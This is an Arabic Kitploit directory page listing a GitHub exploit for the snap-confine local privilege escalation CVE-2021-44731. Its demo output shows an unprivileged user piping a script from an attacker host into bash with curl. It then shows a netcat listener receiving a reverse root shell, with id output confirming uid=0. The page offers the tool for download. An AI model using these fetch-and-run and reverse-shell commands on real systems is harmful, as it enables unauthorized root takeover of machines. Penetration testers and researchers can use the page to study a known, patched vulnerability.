Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
أدوات/GitHubGitHub/deeexcee-io/cve-2021-44731-snap-confine-suid
تصعيد الامتيازاتتحليل الثغرات الأمنيةالاستغلالما بعد الاستغلالاختبار الاختراقالفريق الأحمر
GitHubdeeexcee-io/cve-2021-44731-snap-confine-suid

CVE-2021-44731-snap-confine-SUID

استغلال لرفع الامتيازات محليًا لثغرة CVE-2021-44731 يستهدف إصدارات snap-confine 2.54.2 وما دونها. يكتشف تلقائيًا الملفات الثنائية المعرضة للخطر ويوفّر شل root عبر netcat.

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
عرض المستودع
421منذ 3 سنواتلم تتم المراجعة بعد

CVE-2021-44731-snap-confine-SUID

استغلال رفع الصلاحيات المحلي لـ CVE-2021-44731، snap-confine 2.54.2 والإصدارات الأقدم

كل الفضل لـ Qualys في اكتشاف هذا الثغرة وتوفير استغلال مفصل.

https://www.qualys.com/2022/02/17/cve-2021-44731/oh-snap-more-lemmings.txt

استغلال سريع وغير منظم لـ snap-confine LPE. سيبحث عن إصدار ضعيف من snap-confine، وإذا وجده سيقوم بالاستغلال.

يعيد شيل الجذر، التقطه باستخدام netcat

root@kitploit:~
$id
uid=1001(vulnchain) gid=1001(vulnchain) groups=1001(vulnchannel)
$ curl http://10.8.0.134/snap_confine_LPE.sh | bash
curl http://10.8.0.134/snap_confine_LPE.sh | bash
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100  2073  100  2073    0     0  28397      0 --:--:-- --:--:-- --:--:-- 28013
Non-vulnerable version found: 2.54.3
Vulnerable version found: 2.44.3 at /usr/lib/snapd/snap-confine
Vulnerable version found: 2.44.3 at /home/vulnchain/snap-confine
Performing actions with a vulnerable version...
Chosen vulnerable version: 2.44.3

شيل الجذر

root@kitploit:~
┌──(root㉿kali)-[~]
└─# nc -lvnp 4447    
listening on [any] 4447 ...
connect to [10.8.0.134] from (UNKNOWN) [10.10.111.136] 56050
bash: cannot set terminal process group (609): Inappropriate ioctl for device
bash: no job control in this shell
root@ip-10-10-10-14:/# id
id
uid=0(root) gid=0(root) groups=0(root),1001(vulnchain)
root@ip-10-10-10-14:/# 
تنزيل الأداة